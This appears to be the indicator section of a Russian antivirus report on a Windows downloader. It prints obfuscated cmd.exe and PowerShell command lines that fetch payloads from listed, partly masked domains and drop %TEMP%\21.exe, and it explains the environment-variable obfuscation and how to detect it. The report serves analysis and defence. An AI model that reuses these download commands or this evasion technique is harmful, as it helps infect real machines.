Техническая информация
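- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set dn7l=O\G,RF{0-U.Eqy5jDa9d\bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,3... (обфускация подстроками переменных среды: при стандартном пути C:\ProgramData выражение %ProgramData:~0,1%%ProgramData:~9,2% даёт «CmD»; ключи здесь, по-видимому, показаны с «\» вместо «/» — ср. ту же команду ниже в записи с /V:ON/C)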
- %TEMP%\21.exe
- %TEMP%\21.exe
- 'cr######etinternational.com':80
- 'ma####sexchange.com':80
- 'ho####fashioon.my':80
- DNS ASK cr######etinternational.com
- DNS ASK ma####sexchange.com
- DNS ASK me####aclinic.com
- DNS ASK ja#####howdharyblog.com
- DNS ASK ho####fashioon.my
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set dn7l=O\G,RF{0-U.Eqy5jDa9d\bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,3...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set dn7l=O\G,RF{0-U.Eqy5jDa9d/bC=xY fh}H:(LIeTrskgAM8ln'poKuSPB$~t1Z%;Wwc7m3)4+@Niv2z&&for %y in (47,48,62,59,52,9,53,33,34,22,31,55,14,3,57,59,37,59,51,11,51,51,34,0,71,71,41,42,11,31,...
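- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $vfovv='cifb';$wipjb=new-object Net.WebClient;$nsqrs='http://cr######etinternational.com/gWybm7Y@http://madocksexchange.com/yg... (при типичных значениях PUBLIC=C:\Users\Public, SESSIONNAME=Console и TEMP, оканчивающемся на \Temp, фрагмент pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll раскрывается в «powershell»; в этой командной строке cmd.exe слова «powershell» в явном виде нет, поэтому для обнаружения надёжнее опираться на порождённый процесс и журналы PowerShell, например Script Block Logging)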
- '<SYSTEM32>\cmd.exe'